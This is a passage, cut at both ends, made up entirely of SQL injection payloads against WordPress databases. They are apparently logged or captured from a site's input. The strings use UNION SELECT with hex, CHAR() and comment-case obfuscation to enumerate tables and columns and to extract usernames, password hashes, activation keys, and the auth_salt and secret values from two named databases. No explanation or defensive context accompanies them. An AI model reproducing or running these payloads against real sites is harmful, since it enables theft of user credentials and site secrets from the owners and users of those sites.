LIMIT 5,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7465726D5F7461786F6E6F6D79 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 6,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7465726D73 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7465726D73 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 2,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7465726D73 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7465726D73 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 4,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F757365726D657461 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F757365726D657461 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 2,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F757365726D657461 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F757365726D657461 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 4,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 10,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 2,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 4,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 5,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 6,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 7,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 8,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x77705F7573657273 AND TABLE_SCHEMA=0x636F7367726F76325F77726431 LIMIT 9,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 10,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 11,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 12,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 13,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 14,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 15,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 16,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 17,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 18,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 19,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 2,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 20,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 21,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 22,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 23,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 24,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 25,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 26,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 27,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 28,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 29,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 30,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 31,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 32,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 33,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 34,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 35,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 36,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 37,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 38,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 39,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 4,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 40,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 41,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 43,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 44,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 45,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 46,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 47,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 48,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 49,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 5,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 50,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 51,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 52,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 6,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 7,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 8,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(TABLE_NAME,0x7873716C696E6A64656C,TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES LIMIT 9,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_activation_key) FROM cosgrov2_wrd1.wp_users LIMIT 0,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_activation_key) FROM cosgrov2_wrd1.wp_users LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_pass) FROM cosgrov2_wrd1.wp_users LIMIT 0,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_pass) FROM cosgrov2_wrd1.wp_users LIMIT 1,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_pass) FROM cosgrov2_wrd1.wp_users LIMIT 2,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_pass) FROM cosgrov2_wrd1.wp_users LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_pass) FROM cosgrov2_wrd1.wp_users LIMIT 4,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_pass) FROM cosgrov2_wrd1.wp_users LIMIT 5,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(user_login,0x7873716C696E6A64656C,user_pass) FROM cosgrov2_wrd1.wp_users LIMIT 6,1),0x7873716C696E6A656E64),0x71),0x71)-- 0 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71)-- 0 union select 1- 0/*!unIoN seLeCt 1,concAt(0x4040,optiOn_vAlue,0x4040),3,4,5,6,7 frOm wp_options where option_name=0x617574685f73616c74*/-- 0/*!unIoN seLeCt 1,concAt(0x4040,optiOn_vAlue,0x4040),3,4,5,6,7 frOm wp_options where option_name=0x736563726574*/-- 0/*!unIoN seLeCt 1,concAt(0x4040,usEr_lOgin,0x3a,usEr_paSs,0x4040),3,4,5,6,7 frOm wp_users*/-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),count(user_login),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users -- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 0,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 1,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 10,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 11,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 2,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 3,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 4,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 5,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 6,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 7,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 8,1-- 1 and 1=0 Union Select UNHEX(HEX(CONCAT(CHAR(64),CHAR(95),CHAR(64),user_login,char(59),user_pass,char(59),CHAR(64),CHAR(95),CHAR(64)))) FROM messnerb_wrd12.wp_users LIMIT 9,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 1,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 10,1-- 1 and 1=0 Union Select UNHEX(HEX(concat(0x5B6B65795D,column_name,0x5B6B65795D))) FROM INFORMATION_SCHEMA.columns where table_name=Concat(char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115)) LIMIT 2,1-- 1 and 1=0 Union Select 